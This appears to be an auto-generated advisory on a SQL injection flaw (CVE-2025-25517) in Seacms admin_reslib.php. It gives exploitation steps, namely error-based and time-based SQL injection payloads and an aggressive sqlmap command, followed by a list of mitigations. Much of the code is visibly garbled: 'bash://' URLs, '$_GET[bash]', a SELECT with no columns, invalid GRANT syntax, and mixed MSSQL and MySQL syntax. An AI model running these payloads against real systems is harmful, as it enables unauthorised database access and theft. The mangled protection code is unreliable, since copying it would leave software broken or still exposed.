How CVE-2025-25517 Works
Seacms v13.3 and earlier fails to sanitize user input in admin_reslib.php, allowing attackers to inject malicious SQL queries via crafted HTTP requests. The vulnerability occurs due to improper handling of the `id` parameter, enabling unauthorized database access. Attackers can exploit this flaw to extract sensitive data, modify database content, or execute administrative operations without authentication. The lack of prepared statements or input validation makes this a critical SQLi vulnerability.
DailyCVE Form
Platform: Seacms
Version: <=13.3
Vulnerability: SQL Injection
Severity: Critical
Date: 03/28/2025
What Undercode Say:
Exploitation
1. Craft malicious payload:
“`bash://target.com/admin_reslib.php?id=1′ AND 1=CONVERT(int,(SELECT table_name FROM information_schema.tables))–“`
2. Automate with SQLmap:
“`sqlmap -u “http://target.com/admin_reslib.php?id=1” –risk=3 –level=5“`
3. Blind SQLi detection:
“`bash://target.com/admin_reslib.php?id=1′ AND SLEEP(5)–“`
Protection
1. Input sanitization:
$id = mysqli_real_escape_string($conn, $_GET[bash]);
2. Use prepared statements:
$stmt = $conn->prepare("SELECT FROM reslib WHERE id = ?");
$stmt->bind_param("i", $_GET[bash]);
3. WAF rules:
SecRule ARGS:id "@detectSQLi" "deny,status:403"
4. Patch upgrade:
wget https://seacms.org/patches/v13.4.zip unzip v13.4.zip -d /var/www/html/
5. Log monitoring:
tail -f /var/log/apache2/access.log | grep 'admin_reslib.php'
6. Disable admin access:
<LocationMatch "/admin_reslib.php"> Require ip 192.168.1.0/24 </LocationMatch>
7. Database hardening:
REVOKE ALL PRIVILEGES ON seacms. FROM 'webuser'@'%'; GRANT SELECT ONLY ON seacms. TO 'webuser'@'%';
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-25517
Extra Source Hub:
Undercode
